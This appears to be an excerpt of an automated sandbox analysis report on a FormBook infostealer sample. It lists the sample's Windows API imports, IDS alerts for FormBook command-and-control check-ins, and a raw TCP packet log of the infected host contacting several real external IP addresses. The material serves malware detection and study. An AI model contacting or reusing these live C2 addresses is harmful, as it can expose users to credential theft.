                                                                USER32.dllAdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
                                                                GDI32.dllStrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
                                                                COMDLG32.dllGetOpenFileNameW, GetSaveFileNameW
                                                                ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
                                                                SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                                ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
                                                                OLEAUT32.dllLoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

                                                                Possible Origin

                                                                Language of compilation systemCountry where language is spokenMap
                                                                EnglishGreat Britain

                                                                Network Behavior

                                                                Suricata IDS Alerts

                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                2024-12-11T15:03:50.512729+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749859217.160.0.11380TCP
                                                                2024-12-11T15:03:53.179664+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749868217.160.0.11380TCP
                                                                2024-12-11T15:03:55.942073+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749874217.160.0.11380TCP
                                                                2024-12-11T15:04:14.656907+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749916154.90.58.20980TCP
                                                                2024-12-11T15:04:17.313122+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749926154.90.58.20980TCP
                                                                2024-12-11T15:04:19.984922+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749933154.90.58.20980TCP
                                                                2024-12-11T15:04:29.984933+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.74995538.181.21.17880TCP
                                                                2024-12-11T15:04:32.641240+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.74996438.181.21.17880TCP
                                                                2024-12-11T15:04:35.297492+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.74997238.181.21.17880TCP
                                                                2024-12-11T15:04:53.733644+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.74998423.167.152.4180TCP
                                                                2024-12-11T15:04:56.561078+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.74998523.167.152.4180TCP
                                                                2024-12-11T15:04:59.205755+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.74998623.167.152.4180TCP
                                                                2024-12-11T15:05:10.266493+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749988103.75.185.2280TCP
                                                                2024-12-11T15:05:12.922549+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749989103.75.185.2280TCP
                                                                2024-12-11T15:05:15.578838+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749990103.75.185.2280TCP
                                                                2024-12-11T15:05:25.110598+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749992162.0.213.9480TCP
                                                                2024-12-11T15:05:27.755607+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749993162.0.213.9480TCP
                                                                2024-12-11T15:05:30.482484+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749994162.0.213.9480TCP
                                                                2024-12-11T15:05:40.825659+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749996161.97.168.24580TCP

                                                                Network Port Distribution

                                                                TCP Packets

                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Dec 11, 2024 15:03:31.811115980 CET4981980192.168.2.7104.21.24.198
                                                                Dec 11, 2024 15:03:31.930546045 CET8049819104.21.24.198192.168.2.7
                                                                Dec 11, 2024 15:03:31.930658102 CET4981980192.168.2.7104.21.24.198
                                                                Dec 11, 2024 15:03:31.938921928 CET4981980192.168.2.7104.21.24.198
                                                                Dec 11, 2024 15:03:32.058398008 CET8049819104.21.24.198192.168.2.7
                                                                Dec 11, 2024 15:03:33.292248964 CET8049819104.21.24.198192.168.2.7
                                                                Dec 11, 2024 15:03:33.292359114 CET8049819104.21.24.198192.168.2.7
                                                                Dec 11, 2024 15:03:33.292371035 CET8049819104.21.24.198192.168.2.7
                                                                Dec 11, 2024 15:03:33.292484045 CET8049819104.21.24.198192.168.2.7
                                                                Dec 11, 2024 15:03:33.292598009 CET4981980192.168.2.7104.21.24.198
                                                                Dec 11, 2024 15:03:33.292663097 CET4981980192.168.2.7104.21.24.198
                                                                Dec 11, 2024 15:03:33.292690992 CET8049819104.21.24.198192.168.2.7
                                                                Dec 11, 2024 15:03:33.292704105 CET8049819104.21.24.198192.168.2.7
                                                                Dec 11, 2024 15:03:33.292714119 CET8049819104.21.24.198192.168.2.7
                                                                Dec 11, 2024 15:03:33.292726994 CET8049819104.21.24.198192.168.2.7
                                                                Dec 11, 2024 15:03:33.292740107 CET8049819104.21.24.198192.168.2.7
                                                                Dec 11, 2024 15:03:33.292748928 CET4981980192.168.2.7104.21.24.198
                                                                Dec 11, 2024 15:03:33.292753935 CET8049819104.21.24.198192.168.2.7
                                                                Dec 11, 2024 15:03:33.292769909 CET4981980192.168.2.7104.21.24.198
                                                                Dec 11, 2024 15:03:33.292800903 CET4981980192.168.2.7104.21.24.198
                                                                Dec 11, 2024 15:03:33.412276030 CET8049819104.21.24.198192.168.2.7
                                                                Dec 11, 2024 15:03:33.412372112 CET8049819104.21.24.198192.168.2.7
                                                                Dec 11, 2024 15:03:33.412497997 CET4981980192.168.2.7104.21.24.198
                                                                Dec 11, 2024 15:03:33.415720940 CET4981980192.168.2.7104.21.24.198
                                                                Dec 11, 2024 15:03:33.535218954 CET8049819104.21.24.198192.168.2.7
                                                                Dec 11, 2024 15:03:49.108186007 CET4985980192.168.2.7217.160.0.113
                                                                Dec 11, 2024 15:03:49.227473974 CET8049859217.160.0.113192.168.2.7
                                                                Dec 11, 2024 15:03:49.227730989 CET4985980192.168.2.7217.160.0.113
                                                                Dec 11, 2024 15:03:49.239543915 CET4985980192.168.2.7217.160.0.113
                                                                Dec 11, 2024 15:03:49.358994007 CET8049859217.160.0.113192.168.2.7
                                                                Dec 11, 2024 15:03:50.512629986 CET8049859217.160.0.113192.168.2.7
                                                                Dec 11, 2024 15:03:50.512665987 CET8049859217.160.0.113192.168.2.7
                                                                Dec 11, 2024 15:03:50.512728930 CET4985980192.168.2.7217.160.0.113
                                                                Dec 11, 2024 15:03:50.750423908 CET4985980192.168.2.7217.160.0.113
                                                                Dec 11, 2024 15:03:51.774693012 CET4986880192.168.2.7217.160.0.113
                                                                Dec 11, 2024 15:03:51.894129992 CET8049868217.160.0.113192.168.2.7
                                                                Dec 11, 2024 15:03:51.894253969 CET4986880192.168.2.7217.160.0.113
                                                                Dec 11, 2024 15:03:51.908502102 CET4986880192.168.2.7217.160.0.113
                                                                Dec 11, 2024 15:03:52.027869940 CET8049868217.160.0.113192.168.2.7
                                                                Dec 11, 2024 15:03:53.179491043 CET8049868217.160.0.113192.168.2.7
                                                                Dec 11, 2024 15:03:53.179604053 CET8049868217.160.0.113192.168.2.7
                                                                Dec 11, 2024 15:03:53.179663897 CET4986880192.168.2.7217.160.0.113
                                                                Dec 11, 2024 15:03:53.422441006 CET4986880192.168.2.7217.160.0.113
                                                                Dec 11, 2024 15:03:54.441011906 CET4987480192.168.2.7217.160.0.113
                                                                Dec 11, 2024 15:03:54.560724974 CET8049874217.160.0.113192.168.2.7
                                                                Dec 11, 2024 15:03:54.560888052 CET4987480192.168.2.7217.160.0.113
                                                                Dec 11, 2024 15:03:54.575210094 CET4987480192.168.2.7217.160.0.113
                                                                Dec 11, 2024 15:03:54.695615053 CET8049874217.160.0.113192.168.2.7
                                                                Dec 11, 2024 15:03:54.699395895 CET8049874217.160.0.113192.168.2.7
                                                                Dec 11, 2024 15:03:55.941884995 CET8049874217.160.0.113192.168.2.7
                                                                Dec 11, 2024 15:03:55.942012072 CET8049874217.160.0.113192.168.2.7
                                                                Dec 11, 2024 15:03:55.942073107 CET4987480192.168.2.7217.160.0.113
                                                                Dec 11, 2024 15:03:56.078531027 CET4987480192.168.2.7217.160.0.113
                                                                Dec 11, 2024 15:03:57.097616911 CET4988080192.168.2.7217.160.0.113
                                                                Dec 11, 2024 15:03:57.217380047 CET8049880217.160.0.113192.168.2.7
                                                                Dec 11, 2024 15:03:57.217461109 CET4988080192.168.2.7217.160.0.113
                                                                Dec 11, 2024 15:03:57.225361109 CET4988080192.168.2.7217.160.0.113
                                                                Dec 11, 2024 15:03:57.344866991 CET8049880217.160.0.113192.168.2.7
                                                                Dec 11, 2024 15:03:58.500950098 CET8049880217.160.0.113192.168.2.7
                                                                Dec 11, 2024 15:03:58.500996113 CET8049880217.160.0.113192.168.2.7
                                                                Dec 11, 2024 15:03:58.501571894 CET4988080192.168.2.7217.160.0.113
                                                                Dec 11, 2024 15:03:58.501774073 CET8049880217.160.0.113192.168.2.7
                                                                Dec 11, 2024 15:03:58.502512932 CET4988080192.168.2.7217.160.0.113
                                                                Dec 11, 2024 15:03:58.503870010 CET4988080192.168.2.7217.160.0.113
                                                                Dec 11, 2024 15:03:58.623183966 CET8049880217.160.0.113192.168.2.7
                                                                Dec 11, 2024 15:04:13.013411999 CET4991680192.168.2.7154.90.58.209
                                                                Dec 11, 2024 15:04:13.132827997 CET8049916154.90.58.209192.168.2.7
                                                                Dec 11, 2024 15:04:13.132915974 CET4991680192.168.2.7154.90.58.209
                                                                Dec 11, 2024 15:04:13.146753073 CET4991680192.168.2.7154.90.58.209
                                                                Dec 11, 2024 15:04:13.266232967 CET8049916154.90.58.209192.168.2.7
                                                                Dec 11, 2024 15:04:14.656907082 CET4991680192.168.2.7154.90.58.209
                                                                Dec 11, 2024 15:04:14.755060911 CET8049916154.90.58.209192.168.2.7
                                                                Dec 11, 2024 15:04:14.755311012 CET8049916154.90.58.209192.168.2.7
                                                                Dec 11, 2024 15:04:14.755462885 CET4991680192.168.2.7154.90.58.209
                                                                Dec 11, 2024 15:04:14.755558014 CET4991680192.168.2.7154.90.58.209
                                                                Dec 11, 2024 15:04:14.776648045 CET8049916154.90.58.209192.168.2.7
                                                                Dec 11, 2024 15:04:14.777286053 CET4991680192.168.2.7154.90.58.209
                                                                Dec 11, 2024 15:04:15.675080061 CET4992680192.168.2.7154.90.58.209
                                                                Dec 11, 2024 15:04:15.795500040 CET8049926154.90.58.209192.168.2.7
                                                                Dec 11, 2024 15:04:15.795667887 CET4992680192.168.2.7154.90.58.209
                                                                Dec 11, 2024 15:04:15.808640957 CET4992680192.168.2.7154.90.58.209
                                                                Dec 11, 2024 15:04:15.928057909 CET8049926154.90.58.209192.168.2.7
                                                                Dec 11, 2024 15:04:17.313122034 CET4992680192.168.2.7154.90.58.209
                                                                Dec 11, 2024 15:04:17.411772013 CET8049926154.90.58.209192.168.2.7
                                                                Dec 11, 2024 15:04:17.411884069 CET8049926154.90.58.209192.168.2.7
                                                                Dec 11, 2024 15:04:17.411916971 CET4992680192.168.2.7154.90.58.209
                                                                Dec 11, 2024 15:04:17.411957979 CET4992680192.168.2.7154.90.58.209
                                                                Dec 11, 2024 15:04:17.432410955 CET8049926154.90.58.209192.168.2.7
                                                                Dec 11, 2024 15:04:17.432507992 CET4992680192.168.2.7154.90.58.209
                                                                Dec 11, 2024 15:04:18.331391096 CET4993380192.168.2.7154.90.58.209
                                                                Dec 11, 2024 15:04:18.450859070 CET8049933154.90.58.209192.168.2.7
                                                                Dec 11, 2024 15:04:18.450975895 CET4993380192.168.2.7154.90.58.209
                                                                Dec 11, 2024 15:04:18.470424891 CET4993380192.168.2.7154.90.58.209
                                                                Dec 11, 2024 15:04:18.589855909 CET8049933154.90.58.209192.168.2.7
                                                                Dec 11, 2024 15:04:18.589889050 CET8049933154.90.58.209192.168.2.7
                                                                Dec 11, 2024 15:04:19.984921932 CET4993380192.168.2.7154.90.58.209
                                                                Dec 11, 2024 15:04:20.104787111 CET8049933154.90.58.209192.168.2.7
                                                                Dec 11, 2024 15:04:20.104881048 CET4993380192.168.2.7154.90.58.209
                                                                Dec 11, 2024 15:04:21.009886026 CET4993980192.168.2.7154.90.58.209
                                                                Dec 11, 2024 15:04:21.129319906 CET8049939154.90.58.209192.168.2.7
                                                                Dec 11, 2024 15:04:21.129538059 CET4993980192.168.2.7154.90.58.209
                                                                Dec 11, 2024 15:04:21.137115002 CET4993980192.168.2.7154.90.58.209
                                                                Dec 11, 2024 15:04:21.256524086 CET8049939154.90.58.209192.168.2.7
                                                                Dec 11, 2024 15:04:22.734311104 CET8049939154.90.58.209192.168.2.7
                                                                Dec 11, 2024 15:04:22.734384060 CET8049939154.90.58.209192.168.2.7
                                                                Dec 11, 2024 15:04:22.734450102 CET4993980192.168.2.7154.90.58.209
                                                                Dec 11, 2024 15:04:22.740768909 CET4993980192.168.2.7154.90.58.209
                                                                Dec 11, 2024 15:04:22.860393047 CET8049939154.90.58.209192.168.2.7
                                                                Dec 11, 2024 15:04:28.349085093 CET4995580192.168.2.738.181.21.178
                                                                Dec 11, 2024 15:04:28.468703985 CET804995538.181.21.178192.168.2.7
                                                                Dec 11, 2024 15:04:28.468880892 CET4995580192.168.2.738.181.21.178
                                                                Dec 11, 2024 15:04:28.480719090 CET4995580192.168.2.738.181.21.178
                                                                Dec 11, 2024 15:04:28.600651026 CET804995538.181.21.178192.168.2.7
                                                                Dec 11, 2024 15:04:29.984932899 CET4995580192.168.2.738.181.21.178
                                                                Dec 11, 2024 15:04:30.001517057 CET804995538.181.21.178192.168.2.7
                                                                Dec 11, 2024 15:04:30.001638889 CET4995580192.168.2.738.181.21.178
                                                                Dec 11, 2024 15:04:30.001682043 CET804995538.181.21.178192.168.2.7
                                                                Dec 11, 2024 15:04:30.001740932 CET4995580192.168.2.738.181.21.178
                                                                Dec 11, 2024 15:04:30.104296923 CET804995538.181.21.178192.168.2.7
                                                                Dec 11, 2024 15:04:30.104365110 CET4995580192.168.2.738.181.21.178
                                                                Dec 11, 2024 15:04:31.003127098 CET4996480192.168.2.738.181.21.178
                                                                Dec 11, 2024 15:04:31.122766972 CET804996438.181.21.178192.168.2.7
                                                                Dec 11, 2024 15:04:31.122984886 CET4996480192.168.2.738.181.21.178
                                                                Dec 11, 2024 15:04:31.135067940 CET4996480192.168.2.738.181.21.178
                                                                Dec 11, 2024 15:04:31.254292011 CET804996438.181.21.178192.168.2.7
                                                                Dec 11, 2024 15:04:32.641239882 CET4996480192.168.2.738.181.21.178
                                                                Dec 11, 2024 15:04:32.666948080 CET804996438.181.21.178192.168.2.7
                                                                Dec 11, 2024 15:04:32.667040110 CET804996438.181.21.178192.168.2.7
                                                                Dec 11, 2024 15:04:32.667062998 CET4996480192.168.2.738.181.21.178
                                                                Dec 11, 2024 15:04:32.667094946 CET4996480192.168.2.738.181.21.178
                                                                Dec 11, 2024 15:04:32.760560989 CET804996438.181.21.178192.168.2.7
                                                                Dec 11, 2024 15:04:32.760688066 CET4996480192.168.2.738.181.21.178
                                                                Dec 11, 2024 15:04:33.659455061 CET4997280192.168.2.738.181.21.178
                                                                Dec 11, 2024 15:04:33.779598951 CET804997238.181.21.178192.168.2.7
                                                                Dec 11, 2024 15:04:33.779753923 CET4997280192.168.2.738.181.21.178
                                                                Dec 11, 2024 15:04:33.792908907 CET4997280192.168.2.738.181.21.178
                                                                Dec 11, 2024 15:04:33.912405968 CET804997238.181.21.178192.168.2.7
                                                                Dec 11, 2024 15:04:33.912432909 CET804997238.181.21.178192.168.2.7
                                                                Dec 11, 2024 15:04:35.297492027 CET4997280192.168.2.738.181.21.178
                                                                Dec 11, 2024 15:04:35.320136070 CET804997238.181.21.178192.168.2.7
                                                                Dec 11, 2024 15:04:35.320226908 CET804997238.181.21.178192.168.2.7
                                                                Dec 11, 2024 15:04:35.320260048 CET4997280192.168.2.738.181.21.178
                                                                Dec 11, 2024 15:04:35.320301056 CET4997280192.168.2.738.181.21.178
                                                                Dec 11, 2024 15:04:35.416927099 CET804997238.181.21.178192.168.2.7
                                                                Dec 11, 2024 15:04:35.417079926 CET4997280192.168.2.738.181.21.178
                                                                Dec 11, 2024 15:04:36.315690041 CET4997880192.168.2.738.181.21.178
                                                                Dec 11, 2024 15:04:36.435189962 CET804997838.181.21.178192.168.2.7
                                                                Dec 11, 2024 15:04:36.435306072 CET4997880192.168.2.738.181.21.178
                                                                Dec 11, 2024 15:04:36.445671082 CET4997880192.168.2.738.181.21.178
                                                                Dec 11, 2024 15:04:36.566096067 CET804997838.181.21.178192.168.2.7
                                                                Dec 11, 2024 15:04:37.967968941 CET804997838.181.21.178192.168.2.7
                                                                Dec 11, 2024 15:04:37.968061924 CET804997838.181.21.178192.168.2.7
                                                                Dec 11, 2024 15:04:37.968108892 CET4997880192.168.2.738.181.21.178
                                                                Dec 11, 2024 15:04:37.970577955 CET4997880192.168.2.738.181.21.178
                                                                Dec 11, 2024 15:04:38.090220928 CET804997838.181.21.178192.168.2.7
                                                                Dec 11, 2024 15:04:52.717590094 CET4998480192.168.2.723.167.152.41
                                                                Dec 11, 2024 15:04:52.837054968 CET804998423.167.152.41192.168.2.7
                                                                Dec 11, 2024 15:04:52.837418079 CET4998480192.168.2.723.167.152.41
                                                                Dec 11, 2024 15:04:53.003578901 CET4998480192.168.2.723.167.152.41
                                                                Dec 11, 2024 15:04:53.123347998 CET804998423.167.152.41192.168.2.7
                                                                Dec 11, 2024 15:04:53.731065989 CET804998423.167.152.41192.168.2.7
                                                                Dec 11, 2024 15:04:53.733644009 CET4998480192.168.2.723.167.152.41
                                                                Dec 11, 2024 15:04:54.516314030 CET4998480192.168.2.723.167.152.41
                                                                Dec 11, 2024 15:04:54.635857105 CET804998423.167.152.41192.168.2.7
                                                                Dec 11, 2024 15:04:55.534421921 CET4998580192.168.2.723.167.152.41
                                                                Dec 11, 2024 15:04:55.654239893 CET804998523.167.152.41192.168.2.7
                                                                Dec 11, 2024 15:04:55.654380083 CET4998580192.168.2.723.167.152.41
                                                                Dec 11, 2024 15:04:55.666630983 CET4998580192.168.2.723.167.152.41
                                                                Dec 11, 2024 15:04:55.786272049 CET804998523.167.152.41192.168.2.7
                                                                Dec 11, 2024 15:04:56.560976982 CET804998523.167.152.41192.168.2.7
                                                                Dec 11, 2024 15:04:56.561078072 CET4998580192.168.2.723.167.152.41
                                                                Dec 11, 2024 15:04:57.172732115 CET4998580192.168.2.723.167.152.41
                                                                Dec 11, 2024 15:04:57.292352915 CET804998523.167.152.41192.168.2.7
                                                                Dec 11, 2024 15:04:58.190977097 CET4998680192.168.2.723.167.152.41
                                                                Dec 11, 2024 15:04:58.310620070 CET804998623.167.152.41192.168.2.7
                                                                Dec 11, 2024 15:04:58.310708046 CET4998680192.168.2.723.167.152.41
                                                                Dec 11, 2024 15:04:58.322983027 CET4998680192.168.2.723.167.152.41
                                                                Dec 11, 2024 15:04:58.442704916 CET804998623.167.152.41192.168.2.7
                                                                Dec 11, 2024 15:04:58.442780018 CET804998623.167.152.41192.168.2.7
                                                                Dec 11, 2024 15:04:59.205634117 CET804998623.167.152.41192.168.2.7
                                                                Dec 11, 2024 15:04:59.205754995 CET4998680192.168.2.723.167.152.41
                                                                Dec 11, 2024 15:04:59.828746080 CET4998680192.168.2.723.167.152.41
                                                                Dec 11, 2024 15:04:59.948353052 CET804998623.167.152.41192.168.2.7
                                                                Dec 11, 2024 15:05:00.846916914 CET4998780192.168.2.723.167.152.41
                                                                Dec 11, 2024 15:05:00.966578960 CET804998723.167.152.41192.168.2.7
                                                                Dec 11, 2024 15:05:00.966695070 CET4998780192.168.2.723.167.152.41
                                                                Dec 11, 2024 15:05:00.974229097 CET4998780192.168.2.723.167.152.41
                                                                Dec 11, 2024 15:05:01.093678951 CET804998723.167.152.41192.168.2.7
                                                                Dec 11, 2024 15:05:01.865892887 CET804998723.167.152.41192.168.2.7
                                                                Dec 11, 2024 15:05:01.866180897 CET4998780192.168.2.723.167.152.41
                                                                Dec 11, 2024 15:05:01.866863966 CET4998780192.168.2.723.167.152.41
                                                                Dec 11, 2024 15:05:01.986319065 CET804998723.167.152.41192.168.2.7
                                                                Dec 11, 2024 15:05:08.625334024 CET4998880192.168.2.7103.75.185.22
                                                                Dec 11, 2024 15:05:08.744740963 CET8049988103.75.185.22192.168.2.7
                                                                Dec 11, 2024 15:05:08.744956017 CET4998880192.168.2.7103.75.185.22
                                                                Dec 11, 2024 15:05:08.760087013 CET4998880192.168.2.7103.75.185.22
                                                                Dec 11, 2024 15:05:08.879589081 CET8049988103.75.185.22192.168.2.7
                                                                Dec 11, 2024 15:05:10.266493082 CET4998880192.168.2.7103.75.185.22
                                                                Dec 11, 2024 15:05:10.314253092 CET8049988103.75.185.22192.168.2.7
                                                                Dec 11, 2024 15:05:10.314271927 CET8049988103.75.185.22192.168.2.7
                                                                Dec 11, 2024 15:05:10.314281940 CET8049988103.75.185.22192.168.2.7
                                                                Dec 11, 2024 15:05:10.314373970 CET4998880192.168.2.7103.75.185.22
                                                                Dec 11, 2024 15:05:10.314374924 CET4998880192.168.2.7103.75.185.22
                                                                Dec 11, 2024 15:05:10.314454079 CET4998880192.168.2.7103.75.185.22
                                                                Dec 11, 2024 15:05:10.386085033 CET8049988103.75.185.22192.168.2.7
                                                                Dec 11, 2024 15:05:10.386149883 CET4998880192.168.2.7103.75.185.22
                                                                Dec 11, 2024 15:05:11.284523964 CET4998980192.168.2.7103.75.185.22
                                                                Dec 11, 2024 15:05:11.404211998 CET8049989103.75.185.22192.168.2.7
                                                                Dec 11, 2024 15:05:11.404378891 CET4998980192.168.2.7103.75.185.22
                                                                Dec 11, 2024 15:05:11.419085979 CET4998980192.168.2.7103.75.185.22
                                                                Dec 11, 2024 15:05:11.538536072 CET8049989103.75.185.22192.168.2.7
                                                                Dec 11, 2024 15:05:12.922549009 CET4998980192.168.2.7103.75.185.22
                                                                Dec 11, 2024 15:05:12.978686094 CET8049989103.75.185.22192.168.2.7
                                                                Dec 11, 2024 15:05:12.978710890 CET8049989103.75.185.22192.168.2.7
                                                                Dec 11, 2024 15:05:12.978724957 CET8049989103.75.185.22192.168.2.7
                                                                Dec 11, 2024 15:05:12.978758097 CET4998980192.168.2.7103.75.185.22
                                                                Dec 11, 2024 15:05:12.978790998 CET4998980192.168.2.7103.75.185.22
                                                                Dec 11, 2024 15:05:12.981611967 CET4998980192.168.2.7103.75.185.22
                                                                Dec 11, 2024 15:05:13.042185068 CET8049989103.75.185.22192.168.2.7
                                                                Dec 11, 2024 15:05:13.042241096 CET4998980192.168.2.7103.75.185.22
                                                                Dec 11, 2024 15:05:13.940953970 CET4999080192.168.2.7103.75.185.22
                                                                Dec 11, 2024 15:05:14.060600042 CET8049990103.75.185.22192.168.2.7
                                                                Dec 11, 2024 15:05:14.060883999 CET4999080192.168.2.7103.75.185.22
                                                                Dec 11, 2024 15:05:14.074532986 CET4999080192.168.2.7103.75.185.22
                                                                Dec 11, 2024 15:05:14.194446087 CET8049990103.75.185.22192.168.2.7
                                                                Dec 11, 2024 15:05:14.194493055 CET8049990103.75.185.22192.168.2.7
                                                                Dec 11, 2024 15:05:15.578838110 CET4999080192.168.2.7103.75.185.22
                                                                Dec 11, 2024 15:05:15.634196997 CET8049990103.75.185.22192.168.2.7
                                                                Dec 11, 2024 15:05:15.634242058 CET8049990103.75.185.22192.168.2.7
                                                                Dec 11, 2024 15:05:15.634279966 CET8049990103.75.185.22192.168.2.7
                                                                Dec 11, 2024 15:05:15.634319067 CET4999080192.168.2.7103.75.185.22
                                                                Dec 11, 2024 15:05:15.634375095 CET4999080192.168.2.7103.75.185.22
                                                                Dec 11, 2024 15:05:15.637639999 CET4999080192.168.2.7103.75.185.22
                                                                Dec 11, 2024 15:05:15.698719978 CET8049990103.75.185.22192.168.2.7
                                                                Dec 11, 2024 15:05:15.698945999 CET4999080192.168.2.7103.75.185.22
                                                                Dec 11, 2024 15:05:16.619476080 CET4999180192.168.2.7103.75.185.22
                                                                Dec 11, 2024 15:05:16.739367962 CET8049991103.75.185.22192.168.2.7
                                                                Dec 11, 2024 15:05:16.739479065 CET4999180192.168.2.7103.75.185.22
                                                                Dec 11, 2024 15:05:16.748859882 CET4999180192.168.2.7103.75.185.22
                                                                Dec 11, 2024 15:05:16.868613958 CET8049991103.75.185.22192.168.2.7
                                                                Dec 11, 2024 15:05:18.320144892 CET8049991103.75.185.22192.168.2.7
                                                                Dec 11, 2024 15:05:18.320209980 CET8049991103.75.185.22192.168.2.7
                                                                Dec 11, 2024 15:05:18.320254087 CET8049991103.75.185.22192.168.2.7
                                                                Dec 11, 2024 15:05:18.320393085 CET4999180192.168.2.7103.75.185.22
                                                                Dec 11, 2024 15:05:18.320462942 CET4999180192.168.2.7103.75.185.22
